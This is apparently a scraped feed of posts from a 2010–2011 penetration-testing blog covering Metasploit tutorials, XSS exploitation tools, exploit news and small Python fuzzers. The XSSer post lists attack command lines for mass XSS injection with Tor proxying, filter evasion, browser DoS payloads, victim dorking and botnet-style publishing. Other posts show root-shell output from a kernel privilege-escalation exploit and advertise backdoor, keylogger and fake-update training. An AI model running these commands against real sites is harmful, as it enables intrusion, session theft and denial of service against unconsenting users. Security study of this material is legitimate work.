PENTEST101

Simple Port Scanner

noreply@blogger.com (Pentest101) — Tue, 1 Mar 2011 08:15:00 -0800

http://pastie.org/1621162

SET - SMS Spoofing Attack

noreply@blogger.com (Pentest101) — Wed, 16 Feb 2011 00:10:00 -0800

Metasploit PHP Shell

noreply@blogger.com (Pentest101) — Sat, 12 Feb 2011 09:50:00 -0800

XSSploit

noreply@blogger.com (pentest101) — Tue, 28 Sep 2010 19:50:00 -0700

Introduction :

XSSploit is a multi-platform Cross-Site Scripting scanner and exploiter written in Python. It has been developed to help discovery and exploitation of XSS vulnerabilities in penetration testing missions.

When used against a website, XSSploit first crawls the whole website and identifies encountered forms. It then analyses these forms to automatically detect existing XSS vulnerabilities as well as their main characteristics.

The vulnerabilities that have been discovered can then be exploited using the exploit generation engine of XSSploit. This extensible functionality allows choosing the desired exploit behaviour and automatically generates the corresponding HTML link embedding the exploit payload.

A video is available to explain how to use of XSSploit.

Requirements :

The following elements are required by XSSploit:

- Python 2.5
- wxPython GUI toolkit

Download : http://www.scrt.ch/outils/xssploit/Xssploit-0.5.tar.gz

Source : http://www.scrt.ch/pages_en/xssploit.html

[ TOOLS ] : XSSer

noreply@blogger.com (Pentest101) — Sat, 25 Sep 2010 03:20:00 -0700

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

It contains several options to try to bypass certain filters, and various special techniques of code injection.

Usage

python XSSer.py [-u |-i |-d ] [-p |-g |-c ] [OPTIONS] [Request] [Bypassing] [Techniques]

Examples

* Simple injection from URL:

$ python XSSer.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:

$ python XSSer.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
-------------------
* Multiple injections from URL, with fuzzing, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):

$ python XSSer.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --Fuzz --Hex --verbose -w
-------------------
* Multiple injections from URL, with fuzzing, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):

$ python XSSer.py -u "http://host.com" --Fuzz --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
-------------------
* Advance injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:

$ python XSSer.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une

-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):

$ python XSSer.py --De "duck" -d "search.php?"

-------------------
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):

$ python XSSer.py -c3 --Cw=4 -u "http://host.com"

-------------------
* Simple injection from URL, using POST, with statistics results:

$ python XSSer.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s

-------------------
* Multiple injections from URL to a parameter sending with GET, using Fuzzing, with IP Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Fuzz --Doo --short tinyurl

-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Coo --Anchor --Fr="!enter your final injection code here!"

-------------------
* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"

-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying Fuzzing, changing timeout to "20" and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!):

$ python XSSer.py -i "list_of_url_targets.txt" --Fuzz --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"

-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.

$ pyton XSSer.py --Imx "test.png" --payload "!enter your malicious injection code here!"

-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.

$ python XSSer.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"

-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca
(federated XSS pentesting botnet)

$ python XSSer.py -d "login.php" --De "duck" --publish
http://xsser.sourceforge.net

Download :
http://downloads.sourceforge.net/xsser/xsser-1.0b.tar.gz

Source :
http://xsser.sourceforge.net

METASPLOIT TRAINING V2

noreply@blogger.com (pentest101) — Mon, 26 Jul 2010 01:55:00 -0700

METASPLOIT TRAINING V2.0(2010) : BY PENTEST101 TEAM
BLOG : Pentest101.BlogSpot.Com

METASPLOIT FRAMEWORK :

Metasploit - Penetration Testing Resources
Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project managed by Rapid7.

official site :
http://www.metasploit.com/

before we start this training :
- all this courses belong to pentest101 team .
- this courses , for educational purpose only .
- we are not responsible for any bad usage .
good , we can start noW .

You ArE FreE To SHARE the METASPLOIT TRAINING V2

------------auxiliary---------------
- auxiliary portscan
- auxiliary smb version
- auxiliary smb login check

------------hacking-xp--------------
- hacking xp sp3(bind)
- hacking xp sp3(reverse)
- hacking xp sp3(vncinject)

------------backdoors---------------
- make a backdoor : linux/x86
- make a backdoor (backdoor.py)
- encode a backdoor
- encode a backdoor (backdoor.py)
- make and encode a backdoor (with metasploit and sniff email u/p)
- script proback.py (backdoors for win32 linux osx)

------------meterpreter-------------
- meterpreter commands
- Meterpreter (screensht and key_scan)
- meterpreter packet's sniffing
- meterpreter metscv

------------advanced-usage----------
- autopwn
- browser autopwn
- file autopwn
- java signed applet
- fake update msf and ettercap
- discovering and exploiting remote buffer overflow
- discovering and exploiting remote buffer overflow (egg-hunter)

DOWNLOAD LINK : http://www.megaupload.com/?d=HU32VOI0
PASSWORD : pentest101
you will help us by a small donation : http://pentest101.blogspot.com/p/donate.html
#Pentest101.blogspot.com .

[ METASPLOIT ] : JAVA-SIGNED-APPLET

noreply@blogger.com (pentest101) — Mon, 19 Jul 2010 12:04:00 -0700

[ METASPLOIT ] : java-signed-applet from Pentest101 Team on Vimeo.

apt-get install sun-java6-jdk
echo "JAVA_HOME=/usr/lib/jvm/java-6-sun" >> /etc/bash.bashrc
echo "export JAVA_HOME" >> /etc/bash.bashrc
JAVA_HOME=/usr/lib/jvm/java-6-sun
export JAVA_HOME
gem install rjb

Have Fun

[ BACKTRACK ] : FAKE UPDATE [ MSF , ETTERCAP ]

noreply@blogger.com (pentest101) — Sun, 11 Jul 2010 08:34:00 -0700

hi all,

FAKE UPDATE : MSF , ETTERCAP (demo)

FAKE UPDATE : MSF , ETTERCAP from Pentest101 Team on Vimeo.

HTML FAKE PAGE : http://pastebin.com/LPVardiq

[ BACKTRACK ] : HACKING METASPLOITABLE P1 P2.

noreply@blogger.com (pentest101) — Mon, 21 Jun 2010 12:04:00 -0700

PART1 :

metasploitable real hacking P1 from Pentest101 Team on Vimeo.

PART2 :

metasploitable real hacking P2 from Pentest101 Team on Vimeo.

metasploitable : http://www.metasploit.com/documents/express/Metasploitable.zip.torrent

[ METASPLOIT ] : FILE_AUTOPWN

noreply@blogger.com (pentest101) — Sun, 20 Jun 2010 06:17:00 -0700

hi all

server/file_autopwn

[ METASPLOIT ] : FILE_AUTOPWN from Pentest101 Team on Vimeo.

[ NEWS ] : offensive-security-hacking-tournament

noreply@blogger.com (pentest101) — Wed, 21 Apr 2010 08:37:00 -0700

Got the itch to hack something but don’t want to spend time in prison? Do you wish there was a legal way you could hack some servers just for fun? Then we have a challenge for you. Offensive Security Training is initiating its first ever “Open Hacking Tournament” , and as you can imagine, we’re not going to play fair.

What do you have to do to win this challenge? Use the Internet, use your skills, call your friends, heck, ask your mama – whatever it takes for you to hack our lab machines.

You will race against the clock and against other “hackers” to be the first to compromise all our lab servers, in a CTF style, “sudden death” tournament.

On the Table: One FREE, PWB OR CTP online course with 30 days of labs for the single winner.

On the Clock: The contest will commence between the 8th and 9th of May, 2010.
Job to be Done: Hack the living heck out of our challenge servers, and submit your documentation.
How to Win: Hack us the fastest.

more informations :

http://www.information-security-training.com/news/offensive-security-hacking-tournament/

[ NEWS ] : Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation

noreply@blogger.com (pentest101) — Sat, 10 Apr 2010 02:32:00 -0700

Author: Jon Oberheide
Usage:

$ python team-edward.py
[+] checking for reiserfs mount with user_xattr mount option
[+] checking for private xattrs directory at /.reiserfs_priv/xattrs
[+] preparing shell in /tmp
[+] capturing pre-shell snapshot of private xattrs directory
[+] compiling shell in /tmp
[+] setting dummy xattr to get reiserfs object id
[+] capturing post-shell snapshot of private xattrs directory
[+] found 1 new object ids
[+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468
[+] spawning setuid shell...
# id
uid=0(root) gid=0(root) groups=4(adm), ...

Notes:

Obviously requires a ReiserFS filesystem mounted with extended attributes.
Tested on Ubuntu Jaunty 9.10.
'''

http://www.exploit-db.com/exploits/12130

[ BUFFER OVERFLOW ] : metasploiT anD remotE buffeR overfloW (egg-hunter)

noreply@blogger.com (pentest101) — Thu, 1 Apr 2010 06:57:00 -0700

MSF & Remote Buffer Overflow (egg-hunter) from Pentest101 Team on Vimeo.

[NEWS] : Apple Safari | Tag (heap spray) Remote Buffer Overflow Exploit (osX)

noreply@blogger.com (pentest101) — Fri, 26 Mar 2010 08:40:00 -0700

safari : remote bof

Exploit Code :

#!/usr/bin/env python
#######################################################
#
# Title: Apple Safari <= Tag (heap spray) Remote BOF Exploit (osX)
# Author: eidelweiss
# Special Thank`s to: AL-MARHUM - [D]eal [C]yber - all Senior MEDANHACKER
# Greats: JosS (hackown) , r0073r & 0x1D (inj3ct0r) , kuris (good job beib
LOL)
# Tested on ibook OS X 10.4.11 (ibook g4)
#
#######################################################

http://securityreason.com/exploitalert/8022

[ EBOOKS ] : BUFFER OVERFLOW (EGG-HUNTER)

noreply@blogger.com (pentest101) — Tue, 23 Mar 2010 01:10:00 -0700

we have today a good book about egg-hunter technique
you can download it from here :

--- http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

this book is not mine.
email author : mmiller@hick.org

[ BUFFER OVERFLOW ] : metasploiT anD remotE buffeR overfloW

noreply@blogger.com (pentest101) — Mon, 22 Mar 2010 03:48:00 -0700

MSF & Remote buffer overflow from Pentest101 Team on Vimeo.

[ BACKTRACK ] : Paros Proxy ...

noreply@blogger.com (pentest101) — Mon, 22 Mar 2010 03:45:00 -0700

Paros Proxy ...

hi all ...

blip.tv

[ BACKTRACK ] : Maltego << information gathering >> ...

noreply@blogger.com (pentest101) — Mon, 22 Mar 2010 03:42:00 -0700

Maltego [ information gathering ] ...

hi all ...

blip.tv

[ BACKTRACK ] : bruteforcE routeR witH xhydrA ...

noreply@blogger.com (pentest101) — Mon, 22 Mar 2010 03:40:00 -0700

bruteforcE routeR witH xhydrA ...

blip.tv

[ METASPLOIT ] : meterpreteR as a servicE ...

noreply@blogger.com (pentest101) — Mon, 22 Mar 2010 03:36:00 -0700

meterpreter as a service ...
hi all ...

blip.tv

[ METASPLOIT ] : Packet Sniffing with Meterpreter ...

noreply@blogger.com (pentest101) — Mon, 22 Mar 2010 03:32:00 -0700

Packet Sniffing with Meterpreter ...

http://pentest101.blip.tv

[ METASPLOIT ] : searcH emaiL collectoR

noreply@blogger.com (pentest101) — Mon, 22 Mar 2010 03:30:00 -0700

searcH emaiL collectoR ... by mr-gefara (my friend)

http://p3ntest.blip.tv/

http://blip.tv/file/3171290

svn co http://www.metasploit.com/svn/framework3/trunk/modules/auxiliary/gather
cp -r gather /pentest/exploits/modules/auxiliary
go to msfconsole
search gather
use gather/search_email_collector
show options
set domain yoursite.com
run

[ METASPLOIT ] : changE youR meta BnneR

noreply@blogger.com (pentest101) — Mon, 22 Mar 2010 03:24:00 -0700

changE youR metasploiT banneR ...
hi,every one

wath tutorial :

blip.tv

[ PYTHON ] : local buFF fuzz tools

noreply@blogger.com (pentest101) — Mon, 22 Mar 2010 03:20:00 -0700

local buFF fuzzeR tools (python) ...
hi ,every one ...
To speed up your work
[+] fuzz1.py

#!/usr/bin/python
# coded by data$hack 2010
# usage : python fuzz1.py
import os
import sys
os.system("cls")
d = raw_input("badchar [exemple (A)] : ")
g = d
g += " * ? [exemple (15000)] : "
b = input(g)
s = raw_input("file extension [exemple (m3u)] : ")
a = '\x41' * b;
k = "EvilFile."
k += s
try:
fileHandle = open(k,'w')
fileHandle.write ( a )
fileHandle.close()
except:
print "error check something ..."
sys.exit("")
print "\nfile created succ ..."

[+] md5 maker :

import hashlib
import os
import string
os.system("cls")
d = input("give me a number : ")
k = 0
j = 0
while (k < d):
k = k + 32
j = j + 1
i = 0
cat = ""
while (i < j): i += 1 m = hashlib.md5() # don't forget to "import hashlib" m.update(str(i)) md5 = m.hexdigest() cat += md5 n = len(cat) while (n > d+1):
n = len(cat)
kl = cat[n-1]
cat = cat.rstrip(kl)
fileHandle = open ('md5.md5','w')
fileHandle.write ( cat )
fileHandle.close()

ftp fuzzer by pentest101 [very soon]
[*] finish ...
have fun ...

[ METASPLOIT ] : Add soundrecorder meterpreteR script to metasploit3 ...

noreply@blogger.com (pentest101) — Mon, 22 Mar 2010 03:14:00 -0700

Add soundrecorder meterpreteR script to metasploit3 ...
hi every one ...
[+] open terminal :

su
http://www.darkoperator.com/meterpreter/soundrecorder.zip
unzip soundrecorder.zip
cp soundrecorder/soundrecorder.rb /opt/metasploit3/msf3/scripts/meterpreter [your meta location]

cp soundrecorder/linco.exe /opt/metasploit3/msf3/data
cp soundrecorder/oggenc.exe /opt/metasploit3/msf3/data
meterpreter soundrecorder by pentest101 [here] ...
[*] finish ...